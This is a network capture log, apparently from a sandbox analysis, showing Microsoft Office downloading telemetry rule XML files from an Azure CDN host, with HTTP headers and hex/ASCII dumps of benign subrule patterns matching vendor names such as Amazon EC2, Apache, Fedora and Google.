                                                                                                                            2024-11-29 07:30:59 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:59 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:59 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 400
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                            ETag: "0x8DC582BB2D62837"
                                                                                                                            x-ms-request-id: 4506793e-f01e-0071-0b15-41431c000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073059Z-174f7845968jrjrxhC1EWRmmrs0000000zqg000000007pq1
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:59 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            54192.168.2.54977613.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:00 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:01 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:00 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 479
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                            ETag: "0x8DC582BB7D702D0"
                                                                                                                            x-ms-request-id: f869b653-801e-008c-3284-407130000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073100Z-174f7845968cdxdrhC1EWRg0en0000000zm00000000045g6
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:01 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            55192.168.2.54977713.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:00 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:01 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:01 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 425
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                            ETag: "0x8DC582BBA25094F"
                                                                                                                            x-ms-request-id: cb9203b6-501e-0029-2691-3fd0b8000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073101Z-174f7845968kdththC1EWRzvxn0000000bxg000000007qen
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:01 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            56192.168.2.54977913.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:01 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:01 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:01 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 448
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                            ETag: "0x8DC582BB389F49B"
                                                                                                                            x-ms-request-id: 8322dc88-e01e-00aa-270b-42ceda000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073101Z-174f7845968xlwnmhC1EWR0sv80000000zhg000000000tdb
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:01 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            57192.168.2.54977813.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:01 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:01 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:01 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 475
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                            ETag: "0x8DC582BB2BE84FD"
                                                                                                                            x-ms-request-id: 3470686c-601e-0097-306c-40f33a000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073101Z-174f7845968l4kp6hC1EWRe8840000000zx00000000032wc
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:01 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            58192.168.2.54978013.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:01 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:01 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:01 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 491
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                            ETag: "0x8DC582B98B88612"
                                                                                                                            x-ms-request-id: 22106228-c01e-007a-5d36-40b877000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073101Z-174f7845968qj8jrhC1EWRh41s0000000zeg00000000b5pz
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:01 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            59192.168.2.54978113.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:02 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:03 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:03 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 416
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                            ETag: "0x8DC582BAEA4B445"
                                                                                                                            x-ms-request-id: a5e552fb-801e-0035-1d5b-40752a000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073103Z-174f7845968l4kp6hC1EWRe8840000000zv00000000063rm
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:03 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            60192.168.2.54978213.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:03 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:03 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:03 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 479
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                            ETag: "0x8DC582B989EE75B"
                                                                                                                            x-ms-request-id: a70bbc6a-401e-0029-780b-419b43000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073103Z-174f7845968pght8hC1EWRyvxg00000002t00000000049s5
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:03 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            61192.168.2.54978413.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:03 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:03 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:03 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 471
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                            ETag: "0x8DC582B97E6FCDD"
                                                                                                                            x-ms-request-id: 691d9d27-b01e-0070-2a0b-411cc0000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073103Z-174f7845968qj8jrhC1EWRh41s0000000zhg000000005ddv
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:03 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            62192.168.2.54978313.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:03 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:03 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:03 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 415
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                            ETag: "0x8DC582BA80D96A1"
                                                                                                                            x-ms-request-id: b24172ee-901e-0016-3789-3fefe9000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073103Z-174f78459688l8rvhC1EWRtzr00000000c800000000030zv
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:03 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            63192.168.2.54978513.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:03 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:04 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:03 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 419
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                            ETag: "0x8DC582B9C710B28"
                                                                                                                            x-ms-request-id: 320a0aa9-e01e-003c-0635-41c70b000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073103Z-174f7845968psccphC1EWRuz9s0000000zs000000000bw6d
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
